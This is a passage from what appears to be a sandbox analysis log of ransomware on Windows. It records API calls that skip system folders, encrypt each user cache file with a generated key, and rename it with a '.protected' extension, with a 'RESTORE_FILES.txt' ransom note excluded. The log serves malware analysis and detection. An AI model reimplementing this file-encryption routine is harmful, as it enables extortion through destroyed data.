HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 152 [0089.184] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".rar") returned 0x0 [0089.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 152 [0089.184] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".zip") returned 0x0 [0089.184] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.185] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.185] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.185] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.185] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.185] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.185] CloseHandle (hObject=0x150) returned 1 [0089.185] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.protected") returned 162 [0089.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.protected")) returned 1 [0089.186] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | 
out: lpFindFileData=0x295e7d0) returned 1 [0089.186] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="Windows") returned -1 [0089.186] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="Program Files") returned -1 [0089.186] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="Program Files (x86)") returned -1 [0089.186] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="$Recycle.bin") returned 1 [0089.186] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="System Volume Information") returned -1 [0089.186] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 152 [0089.186] StrStrIW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".protected") returned 0x0 [0089.186] lstrcmpW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="RESTORE_FILES.txt") returned -1 [0089.186] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.186] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 152 [0089.187] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".txt") returned 0x0 [0089.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 152 [0089.187] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".rar") returned 0x0 [0089.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 152 [0089.187] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".zip") returned 0x0 [0089.187] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x198, lpOverlapped=0x0) returned 1 [0089.188] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.188] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x198, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x198, lpOverlapped=0x0) returned 1 [0089.188] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.188] WriteFile (in: hFile=0x150, 
lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.188] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.188] CloseHandle (hObject=0x150) returned 1 [0089.188] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.protected") returned 162 [0089.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.protected")) returned 1 [0089.189] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.189] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="Windows") returned -1 [0089.189] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="Program Files") returned -1 [0089.189] lstrcmpiW 
(lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="Program Files (x86)") returned -1 [0089.189] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="$Recycle.bin") returned 1 [0089.189] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="System Volume Information") returned -1 [0089.189] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 152 [0089.189] StrStrIW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".protected") returned 0x0 [0089.189] lstrcmpW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="RESTORE_FILES.txt") returned -1 [0089.189] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.189] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.190] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 152 [0089.190] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".txt") returned 0x0 [0089.190] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 152 [0089.190] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".rar") returned 0x0 [0089.190] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 152 [0089.190] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".zip") returned 0x0 [0089.190] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1a4, lpOverlapped=0x0) returned 1 [0089.191] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.191] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1a4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1a4, lpOverlapped=0x0) returned 1 [0089.191] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.191] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.191] WriteFile (in: hFile=0x150, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.191] CloseHandle (hObject=0x150) returned 1 [0089.191] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.protected") returned 162 [0089.191] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.protected")) returned 1 [0089.192] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.192] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="Windows") returned -1 [0089.192] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="Program Files") returned -1 [0089.192] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="Program Files (x86)") returned -1 [0089.192] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="$Recycle.bin") returned 1 [0089.192] lstrcmpiW 
(lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="System Volume Information") returned -1 [0089.192] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 152 [0089.192] StrStrIW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".protected") returned 0x0 [0089.192] lstrcmpW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="RESTORE_FILES.txt") returned -1 [0089.192] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.192] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.193] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 152 [0089.193] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".txt") returned 0x0 [0089.193] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 152 [0089.193] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".rar") returned 0x0 [0089.193] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 152 [0089.193] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".zip") returned 0x0 [0089.193] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0089.194] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.194] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0089.194] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.194] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.194] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.194] CloseHandle (hObject=0x150) returned 1 [0089.194] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.protected") returned 162 [0089.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.protected")) returned 1 [0089.195] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.195] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="Windows") returned -1 [0089.195] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="Program Files") returned -1 [0089.195] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="Program Files (x86)") returned -1 [0089.195] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="$Recycle.bin") returned 1 [0089.195] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="System Volume Information") returned -1 [0089.195] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 152 [0089.195] StrStrIW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".protected") returned 0x0 [0089.195] lstrcmpW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="RESTORE_FILES.txt") returned -1 [0089.195] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.195] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.195] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 152 [0089.195] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".txt") returned 0x0 [0089.195] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 152 [0089.195] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".rar") returned 0x0 [0089.195] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 152 [0089.195] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".zip") returned 0x0 [0089.195] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1a0, lpOverlapped=0x0) returned 1 [0089.196] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.196] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1a0, lpOverlapped=0x0) returned 1 [0089.196] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.196] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, 